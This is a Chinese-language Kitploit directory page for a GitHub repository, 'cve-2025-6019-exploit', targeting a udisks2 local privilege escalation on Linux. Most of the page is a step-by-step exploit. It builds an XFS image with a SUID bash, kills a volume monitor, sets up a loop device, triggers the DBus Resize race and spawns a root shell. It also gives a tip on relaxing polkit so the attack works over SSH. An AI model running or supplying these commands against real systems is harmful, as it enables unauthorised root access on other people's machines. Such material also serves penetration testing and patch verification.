Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/and-oss/cve-2025-6019-exploit
权限提升漏洞分析漏洞利用渗透测试二进制利用
GitHuband-oss/cve-2025-6019-exploit

CVE-2025-6019-exploit

漏洞利用

查看仓库
431年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-6019:通过UDisks2文件系统调整大小的权限提升漏洞

漏洞详情

  • CVE ID:CVE-2025-6019
  • 影响:本地权限提升 (LPE)
  • 受影响系统:存在漏洞udisks2版本的Linux系统
  • 机制:文件系统调整大小期间的竞争条件允许访问位于全局可写临时目录中的SUID二进制文件
  • 关键组件:
    • udisks2服务(DBus接口)
    • org.freedesktop.UDisks2.Filesystem.Resize方法
    • /tmp/blockdev*下的临时挂载点

利用流程

1. 准备恶意文件系统镜像(攻击者)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # 设置SUID位
umount ./xfs.mount 

2. 触发漏洞(受害机器)

root@kitploit:~
# 验证系统能力
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# 清除干扰
killall -KILL gvfs-udisks2-volume-monitor

# 设置循环设备
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# 后台监视器(当SUID二进制出现时执行)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# 通过DBus触发漏洞
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

3. 获取Root权限

root@kitploit:~
/tmp/blockdev*/bash -p  # 启动特权Shell
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)

重要!

漏洞仅在logind会话中有效!

  • 脚本必须从logind会话中运行,该会话的 Active=yes 且 Remote=no(例如 tty1)。
  • 当从SSH / pts/* / 反向Shell会话启动时, udisksctl loop-setup --no-user-interaction 调用会被polkit拒绝, 因此PoC会退出并显示 “Failed to create loop device”。

注意:

  • 如果希望通过SSH使用漏洞,必须临时添加polkit规则

如何使用漏洞

创建SUID镜像

root@kitploit:~
$ sudo bash exploit.sh create 

利用系统

root@kitploit:~
$ bash exploit.sh exploit 

PoC视频

poc

下载工具